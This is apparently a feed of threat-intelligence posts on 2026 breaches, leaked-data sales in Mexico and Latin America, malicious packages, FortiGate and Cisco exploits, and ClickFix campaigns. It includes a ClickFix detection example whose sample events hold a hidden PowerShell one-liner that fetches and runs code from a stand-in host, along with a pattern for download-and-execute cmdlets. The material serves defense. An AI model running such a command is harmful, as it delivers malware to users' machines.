🚨 #VECERT_Alert: DATA BLACK MARKET IN MEXICO 🇲🇽💀
A massive operation involving the sale of sensitive information has been detected, led by a cybercriminal operating under the alias MagoSpeak. This individual has made available a criminal catalog that compromises the privacy of millions of citizens and the integrity of the country's most critical institutions.
🏦 BANKING AND RETAIL SECTORS UNDER ATTACK:
The cybercriminal claims to possess customer databases from:
Banks: Santander, BBVA, Banamex, Banorte, HSBC, Scotiabank, Invex, and Banco Azteca (Baz).
Retail/Consumer: Liverpool, Coppel, and Banco del Bajío.
Microfinance: Multibanco and Banco del Bienestar.
🗂️ GOVERNMENT INSTITUTIONS AND DATA:
The severity of the situation escalates with the confirmed exposure of records from:
🆔 Identity: INE (National Electoral Institute).
🏥 Health and Social Security: IMSS, Afores, and records of Retirees/Pensioners.
👴 Vulnerable Populations: Registries of older adults (65+ Program).
📞 TELECOMMUNICATIONS AND BUSINESSES:
MagoSpeak's criminal reach extends to user data from:
📱 Telcel, Movistar, AT&T.
🌐 Telmex, Totalplay.
🏢 Databases belonging to SMEs, Schools, and Large Corporations.
Monitor:
https://t.co/wk9bZJ3laQ
#CyberSecurity #DataLeak #Mexico #ThreatIntel #FinCrime #Ine #Imss #Infosec #MagoSpeak #BreakingNews
🛑 Open VSX flaw lets attackers publish malicious VS Code extensions by bypassing scans.
Single boolean bug treated scan failures as “nothing to scan,” so extensions passed under load and went live.
🔗 How scan failures were misread and checks skipped → https://t.co/MCmczHHARQ
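As an added illustration of the failure mode this post describes (constructed example, not Open VSX's code), the following shows a publish check that collapses the scan outcome to a single "has findings" boolean beside a fail-closed version that only admits an explicit clean verdict; the scanner stand-in, status names and package names are assumptions.

```python
from dataclasses import dataclass, field
from enum import Enum
from typing import List


class ScanStatus(Enum):
    CLEAN = "clean"      # scanner completed and found nothing
    FLAGGED = "flagged"  # scanner completed and found indicators
    ERROR = "error"      # scanner did not complete (timeout, overload, crash)


@dataclass
class ScanResult:
    status: ScanStatus
    findings: List[str] = field(default_factory=list)


def fake_scanner(package_name: str, overloaded: bool) -> ScanResult:
    """Constructed stand-in for a malware scanner; under load it errors out."""
    if overloaded:
        return ScanResult(ScanStatus.ERROR)
    if "evil" in package_name:
        return ScanResult(ScanStatus.FLAGGED, ["suspicious-postinstall"])
    return ScanResult(ScanStatus.CLEAN)


def may_publish_fail_open(result: ScanResult) -> bool:
    """The bug class: outcome reduced to 'did the scan report findings?'.
    An ERROR carries no findings, so it is indistinguishable from CLEAN."""
    has_findings = len(result.findings) > 0
    return not has_findings


def may_publish_fail_closed(result: ScanResult) -> bool:
    """Hardened: only an explicit CLEAN verdict allows publication.
    ERROR means 'not yet scanned' and keeps the extension out of the registry."""
    return result.status is ScanStatus.CLEAN


def evaluate(package_name: str, overloaded: bool) -> dict:
    """Run both decision functions on one scan so the divergence is visible."""
    result = fake_scanner(package_name, overloaded)
    return {
        "status": result.status.value,
        "fail_open": may_publish_fail_open(result),
        "fail_closed": may_publish_fail_closed(result),
    }
```

The third case is the one from the post: with the scanner overloaded, the boolean check lets a malicious package through while the status check holds it back.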
🚨 INTELLIGENCE ALERT: Massive Leak of 500,000 SAT Records – Mexico 🇲🇽📉
Our Analyzer platform has detected a high-impact security breach targeting Mexico's tax infrastructure. Threat actor s1ethx7z has put up for sale a database containing detailed information on half a million taxpayers registered with the Tax Administration Service (SAT).
Victim: SAT Taxpayers (Mexico) 🏛️.
Threat Actor: s1ethx7z 🎭.
Volume: 500,000 RFC records.
Date: March 26, 2026 🗓️.
📋 Compromised Data (PII and Tax Profile)
This leak is extremely dangerous because it combines official identifiers with details regarding the citizens' economic activity:
🔹 Legal Identifiers: Full names, CURP, and RFC.
🔹 Contact Information: Physical addresses and phone numbers.
🔹 Tax Profile: Tax regime, economic activity, email address, and SAT status.
Monitor:
https://t.co/wk9bZJ3laQ
#CyberSecurity #Mexico #SAT #RFC #DataBreach #s1ethx7z #IdentityTheft #FiscalSecurity #InfoSec #CyberAlert #HackingNews #CURP #SATMexico
🚨 Coruna turns a 2023 #iOS espionage exploit into a broader attack kit.
Kaspersky confirms it reuses and evolves the Triangulation kernel exploit, now updated for newer chips and iOS versions and still actively maintained.
Now bundled into 23 exploits across 5 chains and used beyond targeted ops, it shows #iPhone exploitation is scaling.
🔗 How Coruna evolved and is being deployed → https://t.co/WVYDemCYQl
🛑 A device code phishing campaign is hitting 340+ Microsoft 365 orgs using OAuth abuse.
Victims enter codes on real Microsoft pages, generating access and refresh tokens attackers reuse—even after password resets.
🔗 Read → https://t.co/tCiqeCee9q
How are #Ransomware actors getting initial access today?
#SocialEngineering is playing a bigger role with tactics like #ClickFix & Teams-based attacks showing up more often.
Join @rj_chap & @maridegrazia to see how it works, LIVE on Apr. 7 @ 1 PM EST: https://t.co/Y6eQ8iZQ3v
🛑 Malicious LiteLLM versions 1.82.7–1.82.8 deploy credential theft, Kubernetes lateral movement, and a persistent backdoor.
Linked to the Trivy CI/CD compromise, the payload runs on import or via .pth at Python startup, spreads across nodes, and installs a systemd service.
🔗 Full story → https://t.co/YTx4kbP7kh
We have announced the winners of the 2025 @volatility #PluginContest! And the First Place is:
Daniel Baier for XFRM Inspector
Read the full Contest Results in our blog post:
https://t.co/D5lwMbOJV0
Congrats to all winners & thank you to all participants!
#DFIR #memoryforensics
Since late December 2025, Unit 42 has responded to numerous incidents across various industries involving data theft and extortion likely associated with #BlingLibra (aka #ShinyHunters) and affiliated threat actors. Details on how to protect your org: https://t.co/MEB6RJH0rG
The cybercriminal threat actor tracked by Microsoft Threat Intelligence as Storm-2561 is running an SEO-poisoning campaign that redirects people searching for enterprise VPN software to spoofed sites and malicious ZIP downloads leading to credential theft. https://t.co/KzTN7J6Rck
The ZIP file contains a malicious, digitally signed installer that masquerades as a trusted VPN client. The attack chain ultimately loads a variant of Hyrax infostealer that captures VPN sign-in credentials and VPN configuration data, and exfiltrates it to attacker infrastructure.
Read the full Microsoft Defender Experts analysis of the tactics, techniques, and procedures (TTPs) and indicators of compromise of this Storm-2561 campaign, and get protection, detection, and hunting guidance:
INTERPOL dismantled 45,000 malicious IPs and servers tied to phishing, malware, and ransomware.
Operation Synergia III across 72 countries led to 94 arrests, 110 suspects under investigation, and seized devices and servers tied to global scam infrastructure.
🔗 Read → https://t.co/O0FCeTYypF
📌 Cisco Catalyst SD-WAN Vulnerabilities Allow Attackers to Gain Root Access
Source: https://t.co/3Lpm6KmwVO
An urgent security advisory from Cisco warns that multiple vulnerabilities in Cisco Catalyst SD-WAN Manager could allow attackers to bypass authentication, gain root access, and overwrite critical files.
Two of these vulnerabilities are already being exploited in the wild by hackers, making immediate remediation critical.
The advisory details five vulnerabilities, led by CVE-2026-20129, a critical authentication bypass flaw with a CVSS score of 9.8.
#CybersecurityNews
🛑 Iran-linked hackers quietly embedded inside multiple U.S. organizations, Broadcom researchers report.
The campaign is tied to MuddyWater, an #Iranian state group. Attackers deployed a Deno-based backdoor and tried exfiltrating data using Rclone to cloud storage.
🔗 Read → https://t.co/jqP5zPADAu
Microsoft Defender Experts identified a widespread ClickFix social engineering campaign in February 2026 leveraging Windows Terminal as the primary execution mechanism. Rather than the traditional Win + R → paste → execute technique, this campaign instructs targets to use the Windows + X → I shortcut to launch Windows Terminal (wt.exe) directly, guiding users into a privileged command execution environment that blends into legitimate administrative workflows and appears more trustworthy to users.
This approach bypasses detections specifically tuned to Run dialog abuse while exploiting the legitimacy and familiarity of Windows Terminal. Once the terminal is opened, targets are prompted to paste malicious PowerShell commands delivered through fake CAPTCHA pages, troubleshooting prompts, or verification-style lures designed to appear routine and benign.
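Added detection example, not from Microsoft's report: constructed process-creation events and a rule that flags PowerShell launched from Windows Terminal only when the command line carries pasted one-liner traits (encoded payload, hidden window, policy bypass, download-then-run cmdlets), because wt.exe spawning PowerShell by itself is ordinary admin activity. The event format, field names and sample command lines are assumptions.

```python
import re
from typing import Iterable, List, Optional

# Constructed sample process-creation events (not real telemetry); one event per line.
SAMPLE_EVENTS = [
    'parent=explorer.exe image=wt.exe cmd="wt.exe"',
    'parent=wt.exe image=powershell.exe cmd="powershell.exe -NoLogo"',
    'parent=wt.exe image=powershell.exe cmd="powershell.exe Get-ChildItem C:\\Users"',
    'parent=wt.exe image=powershell.exe cmd="powershell.exe -w hidden -ep bypass -c iex (irm http://example.invalid/verify)"',
    'parent=wt.exe image=pwsh.exe cmd="pwsh.exe -enc QUJDREVGR0hJSkw="',
    'parent=cmd.exe image=powershell.exe cmd="powershell.exe -enc QUJDREVGR0hJSkw="',
]

TERMINAL_HOSTS = {"wt.exe", "windowsterminal.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Traits of pasted one-liners rather than interactive admin use: encoded payloads,
# hidden windows, policy bypass, and download-then-execute cmdlets or their aliases.
SUSPICIOUS = re.compile(
    r"(?i)(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-ep\s+bypass|"
    r"\biex\b|invoke-expression|\birm\b|invoke-restmethod|\biwr\b|invoke-webrequest)"
)
EVENT_RE = re.compile(r'parent=(\S+) image=(\S+) cmd="(.*)"')


def parse_event(line: str) -> Optional[dict]:
    """Parse one constructed event line into its fields; None if malformed."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    parent, image, cmd = m.groups()
    return {"parent": parent.lower(), "image": image.lower(), "cmd": cmd}


def is_terminal_clickfix(event: dict) -> bool:
    """Shell spawned by Windows Terminal AND lure-style command line.
    The parent check alone would fire on every admin session, so the
    command-line traits are what separate a paste from normal work."""
    return (
        event["parent"] in TERMINAL_HOSTS
        and event["image"] in SHELLS
        and SUSPICIOUS.search(event["cmd"]) is not None
    )


def hunt(lines: Iterable[str]) -> List[str]:
    """Return the command lines of events matching the rule, in input order."""
    return [ev["cmd"] for ev in map(parse_event, lines) if ev and is_terminal_clickfix(ev)]
```

The last sample event (PowerShell under cmd.exe) is deliberately left unmatched: this rule targets the Windows Terminal variant, and the Run-dialog and cmd.exe paths need their own parent-process scope.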
🚨 Hackers Leveraged CyberStrikeAI Tool to Breach Fortinet FortiGate Devices
Source: https://t.co/9gSGFPiFqU
A new artificial intelligence (AI) offensive security tool called CyberStrikeAI is being actively leveraged by threat actors to target edge devices, particularly Fortinet FortiGate appliances.
This open-source platform, developed by a China-based individual with potential ties to state-sponsored operations, represents a significant escalation in the weaponization of AI for cyber attacks.
It features role-based testing, specialized skills systems, and comprehensive lifecycle management capabilities, all accessible via a centralized dashboard.
#cybersecuritynews #Fortinet
⚠️ 600+ FortiGate devices breached in an AI-assisted campaign.
Team Cymru traced it to #CyberStrikeAI, an open-source Go tool bundling 100+ security utilities, run from 21 IPs across Asia and beyond.
The maintainer shows ties to #China’s vulnerability ecosystem.
🔗 Details → https://t.co/v82vlfdTlE
⚠️ Four popular VS Code extensions expose developers to file theft and remote code execution.
Researchers say 125M+ installs are affected. Flaws in Live Server, Code Runner, and others enable localhost abuse, malicious configs, and code injection—some still unpatched.
🔗 Read → https://t.co/l7bOPlL1qK
🐧 Researchers uncovered SSHStalker, a Linux botnet using IRC for control and mass SSH compromise.
It exploits 16 legacy kernel flaws to infect unpatched systems, wipes logs, and maintains silent persistence.
🔗 Details → https://t.co/Hzbt0HNToO
🚨 Latin America Cyber Threat Alert | Dec 2025 – Feb 2026
LATAM is experiencing one of its worst cyber threat surges — massive government breaches, military database sales, biometric data theft, and ransomware. Thread 🧵👇
🇧🇷 Brazil — CATASTROPHIC government data exposure
→ Brazilian ARMY database for sale: 30 GB / 50M citizen records (names, CPFs, addresses, army rank, blood type) — $200 on BreachForums
→ PRODESP (São Paulo): 200 GB / 2M facial images + CPFs leaked
→ Repediu e-commerce: 21.4M customer records breached
→ Atacadão S. Furtado: 3,644 employee payroll records (salaries, CPFs, FGTS contributions)
→ Domain Admin access to a $10M Brazilian business services firm on sale (FortiGate + 115 hosts)
→ Sumek Brasil: website defaced by Z-BL4CX-H4T
Plus ransomware: The Gentlemen hit Agis (major engineering/construction group) and UNIGRANDE (university).
🇦🇷 Argentina — Biometric & identity data under siege
→ 637K driver license records for sale (350 GB) including biometric assets — priced at $700-$1,800
→ 58,680 citizen photos scraped from government TAD system (filenames = DNI numbers)
🇨🇴 Colombia — Government & aviation targeted
→ Root-level access to Colombian Government Emergency Response Agency on sale (Linux firewall, RCE, shell + admin panel)
→ Avianca airline: 6M passenger records for sale on dark web (names, emails, document numbers)
🇨🇱🇵🇪🇵🇦 Chile, Peru, Panama — Govt hits across the region
🇨🇱 Chile: Instituto Nacional de Derechos Humanos (INDH) — human rights watchdog hit by The Gentlemen ransomware
🇵🇪 Peru: Root RCE + shell access to capital’s regional government portal on sale
🇵🇦 Panama: Universidad de Panamá breached — passwords stored in PLAIN TEXT. Student/staff data exposed.
🇻🇪🇩🇴🇸🇻 Venezuela, Dominican Republic, El Salvador
🇻🇪 Venezuela: 65K Bancrecer bank records for sale (account numbers, balances, transaction history)
🇩🇴 Dominican Republic: Telemon SRL ISP — 42K customer records leaked (IDs, addresses, GPS coordinates, debt info)
🇸🇻 El Salvador: Access to two radio stations on sale via Pharaoh’s Team Market
🔑 Key LATAM takeaways
1⃣ Brazil is the #1 target — military, state govt, and private sector all compromised simultaneously
2⃣ Biometric data theft is surging (facial images, driver license photos, DNIs)
3⃣ The Gentlemen ransomware is emerging as a focused LATAM threat actor
4⃣ Government root-level access is being sold cheaply on forums
5⃣ Every major LATAM country has active threat exposure right now
The latest Microsoft Threat Intelligence Podcast episode dives into tactics shaping financially motivated cybercrime as exemplified by Storm-0727, and threats against the financial services industry. https://t.co/zHq1TaL1lj
Storm-0727 uses classic, tried-and-tested techniques, including effective social engineering and deceptive domains, to target cryptocurrency exchanges, blockchain startups, gaming platforms, financial institutions, and even government organizations.
Across the broader financial services industry, three interrelated trends that take advantage of human and technical weaknesses continue to define the threat landscape: ransomware and extortion, social engineering and phishing-as-a-service (PhaaS) platforms, and business email compromise (BEC).
In discussing these topics, Sherrod DeGrippo, Megan Stalling, and Anna Seitz stress that cybercriminals often use the simplest method that works. They don’t need cutting-edge techniques, just effective ones. Strong credential hygiene, timely patching, and relentless disruption remain defenders’ best tools.